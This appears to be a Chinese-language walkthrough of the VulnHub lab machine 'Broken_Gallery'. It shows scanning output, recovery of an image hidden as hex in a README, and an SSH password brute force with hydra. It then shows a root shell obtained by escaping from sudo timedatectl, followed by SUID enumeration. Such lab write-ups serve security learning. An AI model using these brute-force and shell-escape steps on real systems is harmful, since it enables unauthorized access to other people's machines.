Broken_Gallery 靶机

vulnhub 靶机，要绝处逢生，需要勇气和信心，来挑战吧！枚举和信息收集阶段干扰信息不多，但会一度陷入僵局，没有二进制的经验，会无从下手，那个小节对你来说未必不是挑战，用不到太多二进制的东西，但需要你会你才能建立信心，小技巧走一波才能获得立足点。提权只要知道 gtfobins 就应该不难了，难在具备总结经验，触类旁通等能力。靶机不算特别初级，有一点点难度。——红队笔记UP

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.141                            
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-26 04:56 EDT
Nmap scan report for 192.1.1.141
Host is up (0.00047s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:3B:1C:1C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds

开放了两个端口 80 和 22，进行版本和系统探测

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -sC -p22,80 192.1.1.141                           
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-26 04:57 EDT
Nmap scan report for 192.1.1.141
Host is up (0.00021s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 39:5e:bf:8a:49:a3:13:fa:0d:34:b8:db:26:57:79:a7 (RSA)
|   256 20:d7:72:be:30:6a:27:14:e1:e6:c2:16:7a:40:c8:52 (ECDSA)
|_  256 84:a0:9a:59:61:2a:b7:1e:dd:6e:da:3b:91:f9:a0:c6 (ED25519)
80/tcp open  http    Apache httpd 2.4.18
|_http-title: Index of /
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 55K   2019-08-09 01:20  README.md
| 1.1K  2019-08-09 01:21  gallery.html
| 259K  2019-08-09 01:11  img_5terre.jpg
| 114K  2019-08-09 01:11  img_forest.jpg
| 663K  2019-08-09 01:11  img_lights.jpg
| 8.4K  2019-08-09 01:11  img_mountains.jpg
|_
MAC Address: 00:0C:29:3B:1C:1C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.62 seconds

Ubuntu 操作系统，80 端口下是几个文件

┌──(kali㉿kali)-[~]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.141                              
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-26 04:57 EDT
Nmap scan report for 192.1.1.141
Host is up (0.00019s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   open|filtered ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:3B:1C:1C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 24.33 seconds

UDP 扫描没有很有价值的信息

┌──(kali㉿kali)-[~/Downloads/Broken_Gallery]
└─$ sudo nmap --script=vuln -p22,80 192.1.1.141                           
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-26 06:37 EDT
Nmap scan report for 192.1.1.141
Host is up (0.00015s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server\'s resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
| http-enum: 
|_  /: Root directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.1.1.141:80/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=S%3BO%3DD%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.141:80/?C=D%3BO%3DA%27%20OR%20sqlspider
|_    http://192.1.1.141:80/?C=M%3BO%3DA%27%20OR%20sqlspider
MAC Address: 00:0C:29:3B:1C:1C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 322.34 seconds

nmap 漏洞脚本扫描也没什么有价值的信息，尝试一下nikto

┌──(kali㉿kali)-[~]
└─$ sudo nikto -h http://192.1.1.141/       
[sudo] password for kali: 
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.1.1.141
+ Target Hostname:    192.1.1.141
+ Target Port:        80
+ Start Time:         2023-06-26 06:20:01 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Directory indexing found.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: OPTIONS, GET, HEAD, POST .
+ /./: Directory indexing found.
+ /./: Appending '/./' to a directory allows indexing.
+ //: Directory indexing found.
+ //: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.
+ /%2e/: Directory indexing found.
+ /%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. See: http://www.securityfocus.com/bid/2513
+ ///: Directory indexing found.
+ /?PageServices: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269
+ /?wp-cs-dump: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269
+ ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Directory indexing found.
+ ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Abyss 1.03 reveals directory listing when multiple /'s are requested. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1078
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /README.md: Readme Found.
+ 8074 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2023-06-26 06:20:14 (GMT-4) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Allowed HTTP Methods: OPTIONS, GET, HEAD, POST。没有 PUT 方法，没办法上传文件，尝试目录爆破

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo dirsearch -u http://192.1.1.141/ -r
[sudo] password for kali: 

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                             
                                                                                                                    
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.1.1.141/-_23-06-26_07-55-16.txt

Error Log: /root/.dirsearch/logs/errors-23-06-26_07-55-16.log

Target: http://192.1.1.141/

[07:55:16] Starting: 
[07:55:17] 403 -  297B  - /.ht_wsr.txt                                     
[07:55:17] 403 -  301B  - /.htaccess_extra
[07:55:17] 403 -  300B  - /.htaccess.save
[07:55:17] 403 -  300B  - /.htaccess.orig
[07:55:17] 403 -  300B  - /.htaccess.bak1
[07:55:17] 403 -  300B  - /.htaccess_orig
[07:55:17] 403 -  302B  - /.htaccess.sample
[07:55:17] 403 -  298B  - /.htaccessBAK
[07:55:17] 403 -  299B  - /.htaccessOLD2
[07:55:17] 403 -  298B  - /.htaccess_sc
[07:55:17] 403 -  298B  - /.htaccessOLD
[07:55:17] 403 -  291B  - /.html                                           
[07:55:17] 403 -  290B  - /.htm
[07:55:17] 403 -  300B  - /.htpasswd_test
[07:55:17] 403 -  296B  - /.htpasswds
[07:55:17] 403 -  297B  - /.httr-oauth
[07:55:19] 200 -   55KB - /README.md                                        
[07:55:30] 200 -    1KB - /gallery.html                                     
[07:55:39] 403 -  299B  - /server-status                                    
[07:55:39] 403 -  300B  - /server-status/     (Added to queue)              
[07:55:44] Starting: server-status/                                          
[07:55:44] 404 -  285B  - /server-status/%2e%2e//google.com
                                                                             
Task Completed 

得到的两个有效结果实际上都是 80 端口下可见的文件，目录爆破也没什么新的东西，那就把关注点放在 80 端口下的几个文件吧

Web 渗透

把文件都下载到本地，然后看看是否有隐写的信息，分别使用 file，binwalk，exiftool 和 strings

┌──(kali㉿kali)-[~/Downloads/Broken_Gallery]
└─$ file *          
img_5terre.jpg:    JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 1200x900, components 3
img_forest.jpg:    JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 750x425, components 3
img_lights.jpg:    JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 2988x1680, components 3
img_mountains.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 314x160, components 3
README.md:         CSV text

┌──(kali㉿kali)-[~/Downloads/Broken_Gallery]
└─$ binwalk *             

Scan Time:     2023-06-26 05:05:26
Target File:   /home/kali/Downloads/Broken_Gallery/img_5terre.jpg
MD5 Checksum:  5d37289a16584a465eaacb52e58521d4
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01


Scan Time:     2023-06-26 05:05:26
Target File:   /home/kali/Downloads/Broken_Gallery/img_forest.jpg
MD5 Checksum:  761a639a8a0e2ddac1818348eba4bc3d
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01


Scan Time:     2023-06-26 05:05:26
Target File:   /home/kali/Downloads/Broken_Gallery/img_lights.jpg
MD5 Checksum:  dc0703a8dd937fae387b639dc73827c1
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01


Scan Time:     2023-06-26 05:05:26
Target File:   /home/kali/Downloads/Broken_Gallery/img_mountains.jpg
MD5 Checksum:  8412b3da2a31506bb24050ba8cf6d413
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01


Scan Time:     2023-06-26 05:05:26
Target File:   /home/kali/Downloads/Broken_Gallery/README.md
MD5 Checksum:  db082d3bc4489f6fd9258b79154b0965
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------

┌──(kali㉿kali)-[~/Downloads/Broken_Gallery]
└─$ exiftool *             
======== img_5terre.jpg
ExifTool Version Number         : 12.57
File Name                       : img_5terre.jpg
Directory                       : .
File Size                       : 265 kB
File Modification Date/Time     : 2019:08:09 04:11:02-04:00
File Access Date/Time           : 2023:06:26 05:04:52-04:00
File Inode Change Date/Time     : 2023:06:26 05:03:28-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
Image Width                     : 1200
Image Height                    : 900
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:2 (2 1)
Image Size                      : 1200x900
Megapixels                      : 1.1
======== img_forest.jpg
ExifTool Version Number         : 12.57
File Name                       : img_forest.jpg
Directory                       : .
File Size                       : 117 kB
File Modification Date/Time     : 2019:08:09 04:11:02-04:00
File Access Date/Time           : 2023:06:26 05:04:52-04:00
File Inode Change Date/Time     : 2023:06:26 05:03:37-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 96
Y Resolution                    : 96
Image Width                     : 750
Image Height                    : 425
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 750x425
Megapixels                      : 0.319
======== img_lights.jpg
ExifTool Version Number         : 12.57
File Name                       : img_lights.jpg
Directory                       : .
File Size                       : 679 kB
File Modification Date/Time     : 2019:08:09 04:11:02-04:00
File Access Date/Time           : 2023:06:26 05:04:52-04:00
File Inode Change Date/Time     : 2023:06:26 05:03:44-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Profile CMM Type                : Little CMS
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 2012:01:25 03:41:57
Profile File Signature          : acsp
Primary Platform                : Apple Computer Inc.
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : 
Device Model                    : 
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Perceptual
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : Little CMS
Profile ID                      : 0
Profile Description             : c2
Profile Copyright               : FB
Media White Point               : 0.9642 1 0.82491
Media Black Point               : 0.01205 0.0125 0.01031
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Red Tone Reproduction Curve     : (Binary data 64 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 64 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 64 bytes, use -b option to extract)
Image Width                     : 2988
Image Height                    : 1680
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 2988x1680
Megapixels                      : 5.0
======== img_mountains.jpg
ExifTool Version Number         : 12.57
File Name                       : img_mountains.jpg
Directory                       : .
File Size                       : 8.6 kB
File Modification Date/Time     : 2019:08:09 04:11:02-04:00
File Access Date/Time           : 2023:06:26 05:04:52-04:00
File Inode Change Date/Time     : 2023:06:26 05:03:51-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 314
Image Height                    : 160
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 314x160
Megapixels                      : 0.050
======== README.md
ExifTool Version Number         : 12.57
File Name                       : README.md
Directory                       : .
File Size                       : 57 kB
File Modification Date/Time     : 2019:08:09 04:20:02-04:00
File Access Date/Time           : 2023:06:26 05:04:52-04:00
File Inode Change Date/Time     : 2023:06:26 05:03:09-04:00
File Permissions                : -rw-r--r--
File Type                       : TXT
File Type Extension             : txt
MIME Type                       : text/plain
MIME Encoding                   : us-ascii
Newlines                        : Unix LF
Line Count                      : 584
Word Count                      : 9335
    5 image files read

有个色彩通道提取数据的提示Red Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)

┌──(kali㉿kali)-[~/Downloads/Broken_Gallery]
└─$ exiftool -b img_lights.jpg 
12.57img_lights.jpg.6789092019:08:09 04:11:02-04:002023:06:26 05:04:52-04:002023:06:26 05:03:44-04:00100644JPEGJPGimage/jpeg1 1011lcms528mntrRGB XYZ 2012:01:25 03:41:57acspAPPL00 000.9642 1 0.82491lcms0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0c2FB0.9642 1 0.824910.01205 0.0125 0.010310.43607 0.22249 0.013920.38515 0.71687 0.097080.14307 0.06061 0.7141curv▒��ck
   �?Q!�)�2▒;�FQw]�kpz���|�i�}���0��curv▒��ck
                                             �?Q!�)�2▒;�FQw]�kpz���|�i�}���0��curv▒��ck
                                                                                       �?Q!�)�2▒;�FQw]�kpz���|�i�}���0��298816800832 22988 16805.01984

没什么用，另外其中提到了一个 little cms，搜索后发现是个色彩管理的工具，也没有明显的漏洞，那关注点主要放在 md 文件上，打开文件发现是十六进制的数据

直接问 chatgpt 吧

原来是 jpg 文件，的确文件头和文件末尾都符合 jpg 文件的特征

ZIP Archive (zip)，文件头：50 4B 03 04 文件尾：50 4B
RAR Archive (rar)，文件头：52 61 72 21
JPEG (jpg)，文件头：FF D8 FF 文件尾：FF D9
PNG (png)，文件头：89 50 4E 47 文件尾：AE 42 60 82
GIF (gif)，文件头：47 49 46 38 文件尾：00 3B
TIFF (tif)，文件头：49 49 2A 00 Windows Bitmap (bmp)，文件头：42 4D AE 0A 0B
7-ZIP compressed file(7z) , 文件头：37 7A BC AF 27 1C
avi(RIFF) :52 49 46 46

十六进制转图片

接下来需要把这些十六进制转化为图片，一开始想使用编辑器，但是并没有实现转化为图片的效果，后续搜索了个在线工具：在线十六进制转图片—LZL在线工具 (lzltool.com)，转化成功。当然，这里要对数据进行预处理，将逗号，空格和 0x 都删去，借助于记事本就可以做到，然后将其复制粘贴到网页中，以防那个万一，这里我们还可以将图片下载到本地再次使用 exiftool 等工具进行判断是否有隐写信息

给的信息很有限，仅仅算是获得了几个用户名和一个 application 名。到这里有点束手无策，之前目录爆破也没什么结果，接下来手动尝试试试，将上述图片中的 application，BROEKN，avrahamcohen 作为目录逐一进行尝试，但都没什么结果。在这里卡了很久，甚至尝试了爆破http://192.1.1.141/icons

这里如果不使用在线网站的话，可以使用以下命令将文件转化为二进制，再利用 strings 和 head 配合来判断文件的内容和类型
xxd -r -ps README.md > README.bin
strings README.bin | head -n 20

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo dirsearch -u http://192.1.1.141/icons

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                             
                                                                                                                    
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.1.1.141/-icons_23-06-26_07-57-03.txt

Error Log: /root/.dirsearch/logs/errors-23-06-26_07-57-03.log

Target: http://192.1.1.141/icons/

[07:57:03] Starting: 
[07:57:04] 403 -  303B  - /icons/.ht_wsr.txt                               
[07:57:04] 403 -  308B  - /icons/.htaccess.sample                          
[07:57:04] 403 -  306B  - /icons/.htaccess.orig
[07:57:04] 403 -  306B  - /icons/.htaccess.bak1
[07:57:04] 403 -  306B  - /icons/.htaccess.save
[07:57:04] 403 -  305B  - /icons/.htaccessOLD2
[07:57:04] 403 -  306B  - /icons/.htaccess_orig
[07:57:04] 403 -  307B  - /icons/.htaccess_extra
[07:57:04] 403 -  304B  - /icons/.htaccess_sc
[07:57:04] 403 -  304B  - /icons/.htaccessBAK                              
[07:57:04] 403 -  297B  - /icons/.html
[07:57:04] 403 -  304B  - /icons/.htaccessOLD
[07:57:04] 403 -  296B  - /icons/.htm
[07:57:04] 403 -  302B  - /icons/.htpasswds
[07:57:04] 403 -  306B  - /icons/.htpasswd_test
[07:57:04] 403 -  303B  - /icons/.httr-oauth                               
[07:57:07] 200 -    5KB - /icons/README                                     
[07:57:07] 200 -   35KB - /icons/README.html

ssh爆破

看了眼 WP，原来是将上述收集的信息（包括图片名中有实意的部分和恢复的图片中的人名、加粗的单词）转化为字典，然后 ssh 爆破……这么简单粗暴的思路我竟无言以对，虽然的确有道理，但是用户和密码都是 BROKEN 还是有点离谱（

这里红队笔记 UP 提了一个角度：靶机实质上是实战环境的抽象，因此不能要求其信息是条理清晰地给到你，因为实战环境是更杂乱的。这个角度的确是过去没思考到的

┌──(kali㉿kali)-[~/Downloads/Broken_Gallery]
└─$ hydra -L user -P passwd 192.1.1.141 ssh   
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-26 08:25:54
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.1.1.141:22/
[22][ssh] host: 192.1.1.141   login: broken   password: broken
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-06-26 08:25:59

┌──(kali㉿kali)-[~/Downloads/Broken_Gallery]
└─$ ssh broken@192.1.1.141
The authenticity of host '192.1.1.141 (192.1.1.141)' can\'t be established.
ED25519 key fingerprint is SHA256:2rSjxvkij5hWypyT/706pdaI6YAB0AOIXa7kVnMBDZs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.1.1.141' (ED25519) to the list of known hosts.
broken@192.1.1.141\'s password: 
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-21-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

762 packages can be updated.
458 updates are security updates.

Last login: Fri Aug  9 02:40:48 2019 from 10.11.1.221
broken@ubuntu:~$ ls
Desktop  Documents  Downloads  examples.desktop  Music  Pictures  Public  Templates  Videos
broken@ubuntu:~$ whoami
broken
broken@ubuntu:~$ id
uid=1000(broken) gid=1000(broken) groups=1000(broken),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
broken@ubuntu:~$ uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
broken@ubuntu:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:3b:1c:1c brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.141/24 brd 192.1.1.255 scope global dynamic ens33
       valid_lft 1524sec preferred_lft 1524sec
    inet6 fe80::46:b9bd:c17c:f599/64 scope link 
       valid_lft forever preferred_lft forever
broken@ubuntu:~$ sudo -l
Matching Defaults entries for broken on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User broken may run the following commands on ubuntu:
    (ALL) NOPASSWD: /usr/bin/timedatectl
    (ALL) NOPASSWD: /sbin/reboot

提权

去 gtfobins 搜一搜

timedatectl shell

timedatectl 可以新开 shell

broken@ubuntu:~$ sudo timedatectl list-timezones
……
!/bin/bash
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~# whoami
root
root@ubuntu:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:3b:1c:1c brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.141/24 brd 192.1.1.255 scope global dynamic ens33
       valid_lft 1233sec preferred_lft 1233sec
    inet6 fe80::46:b9bd:c17c:f599/64 scope link 
       valid_lft forever preferred_lft forever
root@ubuntu:~# uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

Linux Polkit helper 提权

broken@ubuntu:/etc$ find / -type f -perm -04000 -ls 2>/dev/null
     1398     56 -rwsr-xr-x   1 root     root        54256 Mar 29  2016 /usr/bin/passwd
     1883    136 -rwsr-xr-x   1 root     root       136808 Mar 30  2016 /usr/bin/sudo
     1507     24 -rwsr-xr-x   1 root     root        23376 Jan 17  2016 /usr/bin/pkexec
      936     76 -rwsr-xr-x   1 root     root        75304 Mar 29  2016 /usr/bin/gpasswd
      616     40 -rwsr-xr-x   1 root     root        40432 Mar 29  2016 /usr/bin/chsh
     1335     40 -rwsr-xr-x   1 root     root        39904 Mar 29  2016 /usr/bin/newgrp
      614     52 -rwsr-xr-x   1 root     root        49584 Mar 29  2016 /usr/bin/chfn
     1962     24 -rwsr-xr-x   1 root     root        23304 Apr 15  2016 /usr/bin/ubuntu-core-launcher
    14572    384 -rwsr-xr--   1 root     dip        390888 Jan 29  2016 /usr/sbin/pppd
   429498     12 -r-sr-xr-x   1 root     root         9532 Aug  9  2019 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
   577108     16 -r-sr-xr-x   1 root     root        14320 Aug  9  2019 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
     5149     12 -rwsr-xr-x   1 root     root        10240 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
     9869     16 -rwsr-xr-x   1 root     root        14864 Jan 17  2016 /usr/lib/policykit-1/polkit-agent-helper-1
     4851     44 -rwsr-xr--   1 root     messagebus    42992 Apr  1  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
